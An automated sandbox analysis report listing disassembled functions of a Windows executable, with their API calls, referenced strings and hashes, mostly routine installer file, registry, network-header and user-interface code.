Instruction ID: e5cb3d23494b362612d19d41f1fa7bf2178f1561c822fb4ba8c80b10f2602ee1
Opcode Fuzzy Hash: 49be8a61a86f247522c51b923c40614f43531019def423c07346c0b0c4cdb566
Instruction Fuzzy Hash: 00F02272A4022AAB93305A92CC89F6FBB5C9F00BB0B11013EF900E7150EB60CC40E7E0

Function 00CC5DF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00CC5F23,?,?,00000000), ref: 00CC5E16
GetLastError.KERNEL32(?,?,00CC5F23,?,?,00000000), ref: 00CC5E20

Strings

fileutil.cpp, xrefs: 00CC5E4A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: 5edb8af78dbaf5fba9695b01f3380eca0a886f27f9c774a0a672dee93f32b1d5
Instruction ID: b56d1bc0c5559eecd0e814678136124b9ff5b717e8c29126f1a72e1142870ea0
Opcode Fuzzy Hash: 5edb8af78dbaf5fba9695b01f3380eca0a886f27f9c774a0a672dee93f32b1d5
Instruction Fuzzy Hash: CDF04F72700619ABDB109F9ACC0AF9F7B6DEB81B61F14002CF918D7140D734EE4496A0

Function 00C971EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,?,00020006,00000000,00000000,00000001,?,?,00CB1E75,000000F9,00000000,000000B9,00000000), ref: 00C97243

Strings

Failed to open registration key., xrefs: 00C97213
Failed to update resume mode., xrefs: 00C9722D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update resume mode.
API String ID: 47109696-3366686031
Opcode ID: b2ab92119a4ab51fa3a0197b032f629183b30c9c2977ea87e8ea6ddbc508b43c
Instruction ID: 83e009ff2d26d2e6bfba2a25ed5fc0d3716da60bb05665046886280a9cc4428b
Opcode Fuzzy Hash: b2ab92119a4ab51fa3a0197b032f629183b30c9c2977ea87e8ea6ddbc508b43c
Instruction Fuzzy Hash: 84F0F6366A5714FBCF12A794EC0BF9E73B9EB94751F20402DF501E2190DA71EE10A654

Function 00CC5D1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C92787,?,?,?,00000000,00000000), ref: 00CC5D33
GetLastError.KERNEL32(?,?,?,00C92787,?,?,?,00000000,00000000,?,?,?,76EEC3F0,?,00000000), ref: 00CC5D3D

Strings

fileutil.cpp, xrefs: 00CC5D62

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 6858a2efe1896e2d55cd53a08a8d6b5a2cede6ffc45444d58ad92ecac724f079
Instruction ID: f82a720bf3b3833af106377f13ff324489dfccdd32dc0525b16b8c8246f7b4d4
Opcode Fuzzy Hash: 6858a2efe1896e2d55cd53a08a8d6b5a2cede6ffc45444d58ad92ecac724f079
Instruction Fuzzy Hash: D9F0C2B6600705ABD7108FAACD09FAE7BF8EF84721B11402DE895D7250E730E9808B60

Function 00CC5CB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00CA819B,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CC5CC7
GetLastError.KERNEL32(?,00CA819B,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CA9C6F,00000000,00000001,?), ref: 00CC5CD1

Strings

fileutil.cpp, xrefs: 00CC5CF6

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: 8ccce1c8ef9de37e2b1203133a5e4b47744e66f07965e651ae77d8e3aa914935
Instruction ID: 2d0cd8f88d80701df938224b0502d928577887bbea91358249dc1d5201555552
Opcode Fuzzy Hash: 8ccce1c8ef9de37e2b1203133a5e4b47744e66f07965e651ae77d8e3aa914935
Instruction Fuzzy Hash: 0CF0AF3120032AABCB108F95CC09F9B7F68EF04761B018028FD1ADB260D731ED50DBA0

Function 00CC8055 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

HttpQueryInfoW.WININET(00000000,20000005,00000000,00000000,00000000), ref: 00CC8074
GetLastError.KERNEL32(?,?,00CB757F,?,?,00000000,000000FF,?,00000000,HEAD,00000000,00000000,?,00000000,?,?), ref: 00CC807E

Strings

inetutil.cpp, xrefs: 00CC809B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHttpInfoLastQuery
String ID: inetutil.cpp
API String ID: 4218848986-2900720265
Opcode ID: 3f71e24b78da41fca1fc7cef577de9ebf48abdd011f05faa216f91fb8d1b7a19
Instruction ID: a0239ecfb0a757caa9c6822b587e20a516441cd4381c561df10b24c433bbd44d
Opcode Fuzzy Hash: 3f71e24b78da41fca1fc7cef577de9ebf48abdd011f05faa216f91fb8d1b7a19
Instruction Fuzzy Hash: 8BF09672600219ABD7108F95CC49FEB7BACEF01761F11812DF915DB250D674DE4887D0

Function 00CC823C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

HttpQueryInfoW.WININET(?,?,00000001,?,00000000), ref: 00CC8265
GetLastError.KERNEL32(?,?,?,00CB71DC,00000000,00000013,00000000,?,?,?,00CB7457,00000000,?,00000000,?,00000000), ref: 00CC826F

Strings

inetutil.cpp, xrefs: 00CC8294

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHttpInfoLastQuery
String ID: inetutil.cpp
API String ID: 4218848986-2900720265
Opcode ID: a5ac57ab6b1645e9fe43d1b2f2c9ca9fd016b81383dc949295b0a54b56bfc462
Instruction ID: 6c20b8d598c891f857a0ffe99924f4972fcee2cc950f973d45f646db003fb359
Opcode Fuzzy Hash: a5ac57ab6b1645e9fe43d1b2f2c9ca9fd016b81383dc949295b0a54b56bfc462
Instruction Fuzzy Hash: 01F012B6A10129BBEB209B95CC4AF9F7BACEB05760F154129FD10E6150E674DE0497A0

Function 00CB0709 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(F08B8006,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000,?,00C91E22,CCBB4868,00C91E22,?,?), ref: 00CB073A
_memset.LIBCMT ref: 00CB074C

Part of subcall function 00CB60DC: SetEvent.KERNEL32(526A5680,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000), ref: 00CB60FD
Part of subcall function 00CB60DC: GetLastError.KERNEL32(?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12,00000000,?,00C91E22,CCBB4868), ref: 00CB6107
Part of subcall function 00CB60DC: CloseHandle.KERNEL32(004005BE,00000000,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12), ref: 00CB61A3
Part of subcall function 00CB60DC: CloseHandle.KERNEL32(526A5680,00000000,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12), ref: 00CB61B0
Part of subcall function 00CB60DC: CloseHandle.KERNEL32(CCBD4468,00000000,00C9222A,00C91E22,?,?,00CB071F,00C9222A,00000000,00C91AA6,?,00C9D9EE,?,00C91AA6,00C91E12,00C91E12), ref: 00CB61BD

Strings

Failed to close cabinet., xrefs: 00CB0725

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$ErrorEventLast_memset
String ID: Failed to close cabinet.
API String ID: 1352847294-2920093955
Opcode ID: 8feaf7544dc5ce48b591096728f81be7c7507ee880f4367dcda20b37dfa5b214
Instruction ID: 2de054381347fcd7016fbcc47f4f374f2c4d5ff08ffae57bb6010964ef3b8fbc
Opcode Fuzzy Hash: 8feaf7544dc5ce48b591096728f81be7c7507ee880f4367dcda20b37dfa5b214
Instruction Fuzzy Hash: 2BF02E32240A1167D2105919EC46E8BB35C8BD1330F300319F678F72C1DF31B9474A54

Function 00CC72D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00C91DEA,00000000,00C91DEA,?,?), ref: 00CC72F3
CoCreateInstance.OLE32(00000000,00000000,00000001,00CE2A20,00000000), ref: 00CC730C

Strings

Microsoft.Update.AutoUpdate, xrefs: 00CC72EE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate
API String ID: 2151042543-675569418
Opcode ID: 6b520a8ca7ea4e4b25d2b57c54fecae755790ab17739f6d02b20cc18b9d64799
Instruction ID: 7c765e1016f649e415efd734a0a3b5e99a4c5f7cc507856e59909df52a6fb41c
Opcode Fuzzy Hash: 6b520a8ca7ea4e4b25d2b57c54fecae755790ab17739f6d02b20cc18b9d64799
Instruction Fuzzy Hash: 79F01271650209BFDB01EBA9C946FDFB7BCEB48705F400435E502E6191DA60AD049672

Function 00CC5BAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00CC59D0: SysAllocString.OLEAUT32(?), ref: 00CC59E3
Part of subcall function 00CC59D0: VariantInit.OLEAUT32(?), ref: 00CC59EF
Part of subcall function 00CC59D0: VariantClear.OLEAUT32(?), ref: 00CC5A63
Part of subcall function 00CC59D0: SysFreeString.OLEAUT32(00000000), ref: 00CC5A6E

_wcstoul.LIBCMT ref: 00CC5BD4

Part of subcall function 00CC9171: wcstoxl.LIBCMT ref: 00CC9181

SysFreeString.OLEAUT32(00000000), ref: 00CC5BEA

Strings

`<u, xrefs: 00CC5BEA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$FreeVariant$AllocClearInit_wcstoulwcstoxl
String ID: `<u
API String ID: 935627439-3367579956
Opcode ID: ad541ce23ee389c38464c6eb247ac8f335757afc8b1c2f1e2a4db42384ab03fb
Instruction ID: 4497c3a4fef368284cfe94034155f3be2d14762c1166a7797760984555bc7f09
Opcode Fuzzy Hash: ad541ce23ee389c38464c6eb247ac8f335757afc8b1c2f1e2a4db42384ab03fb
Instruction Fuzzy Hash: D3F05832900619FBCF019F90CC06F9D7B68EF00325F240068F901A6160D771AF60EB94

Function 00CBA86A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,00CBA8A3,00000000,00000000,00000000,00000000,00000000,00CBC5E1,?,00CB9587,00000003,00CBBB5E,00000001,00000000,00000000), ref: 00CBA875
__invoke_watson.LIBCMT ref: 00CBA891

Strings

PNv, xrefs: 00CBA875

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: PNv
API String ID: 4034010525-4070351811
Opcode ID: 8b3c1717e8dd77b3611e800458b28fa7ef1ac6055b2444000afeb7793c94b77e
Instruction ID: c225ff4465e844f65fe5de0b616a8b12dcb4ad3cca384e354fced7441a6ab3ed
Opcode Fuzzy Hash: 8b3c1717e8dd77b3611e800458b28fa7ef1ac6055b2444000afeb7793c94b77e
Instruction Fuzzy Hash: 9BE0B632000109ABDF052FA5DC09AAE3B6AEB44251F544920F92485471DB33CD72AB95

Function 00CC37CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC309E: _memset.LIBCMT ref: 00CC30C5
Part of subcall function 00CC309E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CC30DA
Part of subcall function 00CC309E: LoadLibraryW.KERNELBASE(?,?,00000104,00C91C3B), ref: 00CC3128
Part of subcall function 00CC309E: GetLastError.KERNEL32 ref: 00CC3134

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00CC37ED

Strings

AdvApi32.dll, xrefs: 00CC37D2
RegDeleteKeyExW, xrefs: 00CC37E2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressDirectoryErrorLastLibraryLoadProcSystem_memset
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 2769571726-850864035
Opcode ID: 8da139bb709c90bb049c6b6e3b1f49a0d6e7b7edad8fdd692aad385f5a48e7c8
Instruction ID: 394272b11d81d0282b944902cb28b1373943fa5a9364b7a50bc11cbb205dd34b
Opcode Fuzzy Hash: 8da139bb709c90bb049c6b6e3b1f49a0d6e7b7edad8fdd692aad385f5a48e7c8
Instruction Fuzzy Hash: A4E0EC715493E19FE3105F15FC4AB4E3A60E701B55F0842E9E4009B1B1D3FA8D419790

Analysis Process: ._cache_LisectAVT_2403002A_282.exePID: 6952, Parent PID: 6884COMMON

Executed Functions

Function 6C9CA815 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C9CA840
FindFirstFileW.KERNELBASE(00000000,?,%u\%ls,00000000,00000000), ref: 6C9CA850
FindClose.KERNELBASE(00000000), ref: 6C9CA85C

Strings

%u\%ls, xrefs: 6C9CA82D

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst_memset
String ID: %u\%ls
API String ID: 3141757445-1753770661
Opcode ID: e648c0a9122422a8fdf2f2601e8f2767567aa3b8ba5ea45fdc4a7a34fadf29d7
Instruction ID: 8a835da5ed47b74eb9bb3d5f142bd48b3ef438a573394de05fd69b29e5c9b6c2
Opcode Fuzzy Hash: e648c0a9122422a8fdf2f2601e8f2767567aa3b8ba5ea45fdc4a7a34fadf29d7
Instruction Fuzzy Hash: 6C01D676B01508AFCB00DEA88CC49AEF3BCEB46219F100165F955E3580D774EE4A8B52

Function 6C9C91B1 Relevance: 75.7, APIs: 28, Strings: 15, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000080,00000000,Billboard,00000000,?,?,00000080,?,?,00000080,?), ref: 6C9C92E9
CompareStringW.KERNEL32(0000007F,00000000,?,00000000,Button,00000000), ref: 6C9C9305
CompareStringW.KERNEL32(0000007F,00000000,6C9D7498,00000000,6C9D7498,00000001), ref: 6C9C931E
CompareStringW.KERNEL32(0000007F,00000000,?,00000000,Checkbox,00000000), ref: 6C9C9336
CompareStringW.KERNEL32(0000007F,00000000,6C9D7834,00000000,6C9D7834,00000002), ref: 6C9C934F
CompareStringW.KERNEL32(0000007F,00000000,?,00000000,Editbox,00000000), ref: 6C9C9367
CompareStringW.KERNEL32(0000007F,00000000,6C9D781C,00000000,6C9D781C,00000002), ref: 6C9C9380
CompareStringW.KERNEL32(0000007F,00000000,?,00000000,Hyperlink,00000000), ref: 6C9C9398
CompareStringW.KERNEL32(0000007F,00000000,6C9D7804,00000000,6C9D7804,00000001), ref: 6C9C93B1
CompareStringW.KERNEL32(0000007F,00000000,?,00000000,Hypertext,00000000), ref: 6C9C93C9
SysFreeString.OLEAUT32(?), ref: 6C9C95CC
SysFreeString.OLEAUT32(00000000), ref: 6C9C9616

Strings

Tab, xrefs: 6C9C951F
thmutil.cpp, xrefs: 6C9C9268
Static, xrefs: 6C9C946B
Listview, xrefs: 6C9C94CD
Button, xrefs: 6C9C92F9
Hyperlink, xrefs: 6C9C938C
Editbox, xrefs: 6C9C935B
Treeview, xrefs: 6C9C94F6
Billboard, xrefs: 6C9C92DD
Checkbox, xrefs: 6C9C932A
Richedit, xrefs: 6C9C943A
Text, xrefs: 6C9C949C
Hypertext, xrefs: 6C9C93BD
Image, xrefs: 6C9C93D8
Progressbar, xrefs: 6C9C9409

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$Compare$Free
String ID: Billboard$Button$Checkbox$Editbox$Hyperlink$Hypertext$Image$Listview$Progressbar$Richedit$Static$Tab$Text$Treeview$thmutil.cpp
API String ID: 318886736-75530310
Opcode ID: 4f756e8f6b5d49e08d13e81da9a5d2a87c01eb94838a33ea58d3cff573b8bb8d
Instruction ID: 9bd516b1b8027ef003667f2d5daf2c3c5f475f49d30f1a5f73748f4de0f8f15c
Opcode Fuzzy Hash: 4f756e8f6b5d49e08d13e81da9a5d2a87c01eb94838a33ea58d3cff573b8bb8d
Instruction Fuzzy Hash: 74D1C070E40688BEDB128F94CC86EAFBA7DEB85708F214855F511B6994C271EE41CB63

Function 6C9C882B Relevance: 58.4, APIs: 2, Strings: 31, Instructions: 633COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6C9C8C65

Part of subcall function 6C9CA126: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,?,?,00000000,00000000,?,?,6C9C85FB,?,Underline,?), ref: 6C9CA15C

SysFreeString.OLEAUT32(00000000), ref: 6C9C8FAA

Strings

thmutil.cpp, xrefs: 6C9C889B
DisablePrefix, xrefs: 6C9C8D1B
FontId, xrefs: 6C9C8A44
Loop, xrefs: 6C9C8C84
Width, xrefs: 6C9C8981
SourceY, xrefs: 6C9C8A0C
HasLines, xrefs: 6C9C8F6C
ImageList, xrefs: 6C9C8D8F
FileSystemAutoComplete, xrefs: 6C9C8BCF
SourceX, xrefs: 6C9C89D4
TabStop, xrefs: 6C9C8B1F
AlwaysShowSelect, xrefs: 6C9C8F1D
Name, xrefs: 6C9C88B3
Interval, xrefs: 6C9C8CAE
LinesAtRoot, xrefs: 6C9C8F46
SelectedFontId, xrefs: 6C9C8AB4
ImageListSmall, xrefs: 6C9C8DC9
Visible, xrefs: 6C9C8B74
sid, xrefs: 6C9C8C10
HideWhenDisabled, xrefs: 6C9C8BA4
StringId, xrefs: 6C9C8BFA
HexStyle, xrefs: 6C9C8AEE
FullRowSelect, xrefs: 6C9C8EC0
Center, xrefs: 6C9C8CEE
ImageListState, xrefs: 6C9C8E03
HasButtons, xrefs: 6C9C8EF0
ImageListGroupHeader, xrefs: 6C9C8E3D
Height, xrefs: 6C9C8948
HexExtendedStyle, xrefs: 6C9C8D5E
EnableDragDrop, xrefs: 6C9C8E93
HoverFontId, xrefs: 6C9C8A7C

Memory Dump Source

Source File: 00000002.00000002.3584910782.000000006C9C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 00000002.00000002.3584895826.000000006C9C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585070512.000000006C9DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9c0000_UNK_.jbxd

Similarity

API ID: String$Free$Compare
String ID: AlwaysShowSelect$Center$DisablePrefix$EnableDragDrop$FileSystemAutoComplete$FontId$FullRowSelect$HasButtons$HasLines$Height$HexExtendedStyle$HexStyle$HideWhenDisabled$HoverFontId$ImageList$ImageListGroupHeader$ImageListSmall$ImageListState$Interval$LinesAtRoot$Loop$Name$SelectedFontId$SourceX$SourceY$StringId$TabStop$Visible$Width$sid$thmutil.cpp
API String ID: 1324494773-2239863677
Opcode ID: 7c1676debb8e3acf2c05ccb860713b9d87c65b2f4d20125262fdefd78abf7685
Instruction ID: c6ac118d083e9f85f0986aacb39c96e69c662a053711459295693aab45d0c9f3
Opcode Fuzzy Hash: 7c1676debb8e3acf2c05ccb860713b9d87c65b2f4d20125262fdefd78abf7685
Instruction Fuzzy Hash: 73120632701918BFCB059E60CC80ADE377E9F95268F264552E811A7A40EB35DB46C7AB

Function 6C9C7133 Relevance: 38.9, APIs: 16, Strings: 6, Instructions: 425
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32(00000024,?), ref: 6C9C716B
CompareStringW.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,?,?,00000000), ref: 6C9C735B
CreateWindowExW.USER32(00000000,6C9C2035,?,4000000D,?,?,?,?,00000000,?,00000000,00000000), ref: 6C9C740F
SHAutoComplete.SHLWAPI(00000000,00000010), ref: 6C9C7434
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 6C9C7455
SendMessageW.USER32(0000000F,00001061,?,0000000F), ref: 6C9C74B0
SendMessageW.USER32(0000000F,00001003,00000003,4000000D), ref: 6C9C74F1
SendMessageW.USER32(?,00000030,?,00000000), ref: 6C9C75BF
GetLastError.KERNEL32(?,?,00000000), ref: 6C9C75F1
GetLastError.KERNEL32(?,?,00000000), ref: 6C9C761D
GetLastError.KERNEL32(?,?,00000000), ref: 6C9C7649

Strings

Riched20.dll, xrefs: 6C9C72E4
ThemeHyperLink, xrefs: 6C9C725D
thmutil.cpp, xrefs: 6C9C7673
Static, xrefs: 6C9C7186
Button, xrefs: 6C9C71DE
+, xrefs: 6C9C7264

Memory Dump Source

